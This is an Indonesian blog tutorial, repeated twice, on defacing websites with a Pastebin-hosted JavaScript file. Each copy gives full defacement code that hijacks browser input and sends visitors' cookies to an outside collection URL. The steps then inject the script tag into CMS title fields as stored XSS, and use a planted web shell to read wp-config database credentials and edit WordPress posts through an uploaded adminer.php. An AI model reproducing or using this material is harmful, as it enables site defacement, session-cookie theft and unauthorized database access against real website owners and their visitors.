TUTORIAL JSO
Tutorial Deface metode JSO
Ket:
JSO merupakan teknik deface yang biasa digunakan saat kamu bypass dan tidak menemukan uploader.
Atau, kamu menemukan Target, sudah tanam Shel tapi filenya tidak bisa di edit, chmod, delete, rename (biasanya disebut dir merah/Forbidden File)
SYARAT:
1. Harus punya depesan di web lain
2. script JSO yang sudah ada di paste bin. (Copas dari gugel aja kalo gk ada)
3. Skill coli
4. Tamvan
5. Suka Ngebacot
Awalan:
Untuk awalan, kita buat script JSO kita dulu.
1. Buka web yang sudah ada script HTML kamu
2. Buka Text Editor kamu
3. Copas ini di Text Editor Kamu
/*
<style>html,body{color:#ffffff}</style><font color='black'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title=" *title disini* "
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="http://i.imgur.com/QYUFm5u.png";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert(" *alert disini* ");}
document.onkeydown=keypressed;
function kasih_tau(){
alert(' *alert disini* ');
}
if(location.href.indexOf('sman2bangkalan.sch.id')==-1)setTimeout("alert(' *alert disini* ');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='( *url web ygprnh lu depes* )' height='1200px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="1337@null.net";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:black"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='( *url web yg prnh lu depes* )' height='1200px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}
(perhatikan yang ada Bintang. Yang alert isi Alert untk script kamu, yang inner HTML isi url web tempat sc depesan kamu)
4. Buka Pastebin. saya sarankan untuk register biar bisa buat banyak file di pastebin
5. Di pastebin, + New Paste
6. Paste script, syntax none saja.
7. Save. Habis itu, Raw.
8. Di copas url setelah ku klik raw. Contohnya: https://pastebin.com/raw/dVPNeRRr
9. Paste di <script type="text/javascript" src=" "></script> hingga hasilnya jadi <script type="text/javascript" src="https://pastebin.com/raw/dVPNeRRr"></script>
10. save di Notepad atau text editor kamu. biar nanti bisa langsung copas.
11. Done. :)
Langkah-langkah.
A. Untuk Bypass
1. Masuk ke target
2. Cari tempat edit text. Biasanya sih di Agenda, Berita, dll. Intinya nanti akan muncul di Homepage(biar homepage deface gitu)
3. Di bagian Title, Copas script yang tadi kita save di notepad. Contohnya: <script type="text/javascript" src="https://pastebin.com/raw/dVPNeRRr"></script>
4. Save
5. Done. :)
Cara bukanya, tinggal ke homepage. Misalnya kamu tadi edit Agenda. Maka di header, cari agenda. dll. Kalo berhasil. akan muncul script Kamu. :)
B. Untuk atasi dir merah
Menurut saya, ini cukup berguna. Dan bisa kita gunakan untuk Symlink, dan Jumping meskipun red dir.
Ini hampir mirip dengan tutorial Symlink. Jadi, yang udah bisa Symlink, pasti lebih mudah.
1. Masuk ke shell kamu.
2. Upload adminer.php (Kaga punya? Cari di google) Dan buka admimer.php kamu di tab baru. Lalu, kembali ke shell kamu.
3. Cari file config(get config)
Kalo CMS WORDPRESS, biasanya namanya wp-config. Untuk CMS JOMBLO, LOKOMEDIA, dll, search google lah. :)
4. Buka dan cari data yang bersangkutan dengan mysql. Yaitu, mysql host, my sql db_name, mysql db_user, dan mysql_pass. Kadang namanya beda. Jadi, Use Your Brain. :)
5. Kembali ke adminer kamu dan login menggunakan data yang kita dapat tadi.
6. Selamat. Kamu sudah login.
7. Kalo CMS WORDPRESS, klik tulisan PILIH di samping WP-OPTIONS untuk edit title. Dan klik PILIH di samping tulisan WP-POST untuk edit homepage target.
8. Di WP-POST tadi, cari yang published. Karna ada beberapa kategori. Ada yang published, Draft, dll.
9. Klik edit pada bagian yang published. Terus di kolom title, Copas SCRIPT JSO yang tadi. Contohnya: <script type="text/javascript" src="https://pastebin.com/raw/dVPNeRRr"></script>
10. Save.
11. Done :)
Cara buka, tinggal ke homepage aja. kalo berhasil, akan muncul script depes kamu.
Sekian tutor dari saya. Ini yang pertama lohh. Maaf kalo panjang. Kan biar jelas. :)
Ket:
JSO merupakan teknik deface yang biasa digunakan saat kamu bypass dan tidak menemukan uploader.
Atau, kamu menemukan Target, sudah tanam Shel tapi filenya tidak bisa di edit, chmod, delete, rename (biasanya disebut dir merah/Forbidden File)
SYARAT:
1. Harus punya depesan di web lain
2. script JSO yang sudah ada di paste bin. (Copas dari gugel aja kalo gk ada)
3. Skill coli
4. Tamvan
5. Suka Ngebacot
Awalan:
Untuk awalan, kita buat script JSO kita dulu.
1. Buka web yang sudah ada script HTML kamu
2. Buka Text Editor kamu
3. Copas ini di Text Editor Kamu
/*
<style>html,body{color:#ffffff}</style><font color='black'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title=" *title disini* "
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="http://i.imgur.com/QYUFm5u.png";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert(" *alert disini* ");}
document.onkeydown=keypressed;
function kasih_tau(){
alert(' *alert disini* ');
}
if(location.href.indexOf('sman2bangkalan.sch.id')==-1)setTimeout("alert(' *alert disini* ');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='( *url web ygprnh lu depes* )' height='1200px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="1337@null.net";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:black"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='( *url web yg prnh lu depes* )' height='1200px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}
(perhatikan yang ada Bintang. Yang alert isi Alert untk script kamu, yang inner HTML isi url web tempat sc depesan kamu)
4. Buka Pastebin. saya sarankan untuk register biar bisa buat banyak file di pastebin
5. Di pastebin, + New Paste
6. Paste script, syntax none saja.
7. Save. Habis itu, Raw.
8. Di copas url setelah ku klik raw. Contohnya: https://pastebin.com/raw/dVPNeRRr
9. Paste di <script type="text/javascript" src=" "></script> hingga hasilnya jadi <script type="text/javascript" src="https://pastebin.com/raw/dVPNeRRr"></script>
10. save di Notepad atau text editor kamu. biar nanti bisa langsung copas.
11. Done. :)
Langkah-langkah.
A. Untuk Bypass
1. Masuk ke target
2. Cari tempat edit text. Biasanya sih di Agenda, Berita, dll. Intinya nanti akan muncul di Homepage(biar homepage deface gitu)
3. Di bagian Title, Copas script yang tadi kita save di notepad. Contohnya: <script type="text/javascript" src="https://pastebin.com/raw/dVPNeRRr"></script>
4. Save
5. Done. :)
Cara bukanya, tinggal ke homepage. Misalnya kamu tadi edit Agenda. Maka di header, cari agenda. dll. Kalo berhasil. akan muncul script Kamu. :)
B. Untuk atasi dir merah
Menurut saya, ini cukup berguna. Dan bisa kita gunakan untuk Symlink, dan Jumping meskipun red dir.
Ini hampir mirip dengan tutorial Symlink. Jadi, yang udah bisa Symlink, pasti lebih mudah.
1. Masuk ke shell kamu.
2. Upload adminer.php (Kaga punya? Cari di google) Dan buka admimer.php kamu di tab baru. Lalu, kembali ke shell kamu.
3. Cari file config(get config)
Kalo CMS WORDPRESS, biasanya namanya wp-config. Untuk CMS JOMBLO, LOKOMEDIA, dll, search google lah. :)
4. Buka dan cari data yang bersangkutan dengan mysql. Yaitu, mysql host, my sql db_name, mysql db_user, dan mysql_pass. Kadang namanya beda. Jadi, Use Your Brain. :)
5. Kembali ke adminer kamu dan login menggunakan data yang kita dapat tadi.
6. Selamat. Kamu sudah login.
7. Kalo CMS WORDPRESS, klik tulisan PILIH di samping WP-OPTIONS untuk edit title. Dan klik PILIH di samping tulisan WP-POST untuk edit homepage target.
8. Di WP-POST tadi, cari yang published. Karna ada beberapa kategori. Ada yang published, Draft, dll.
9. Klik edit pada bagian yang published. Terus di kolom title, Copas SCRIPT JSO yang tadi. Contohnya: <script type="text/javascript" src="https://pastebin.com/raw/dVPNeRRr"></script>
10. Save.
11. Done :)
Cara buka, tinggal ke homepage aja. kalo berhasil, akan muncul script depes kamu.
Sekian tutor dari saya. Ini yang pertama lohh. Maaf kalo panjang. Kan biar jelas. :)
Komentar
Posting Komentar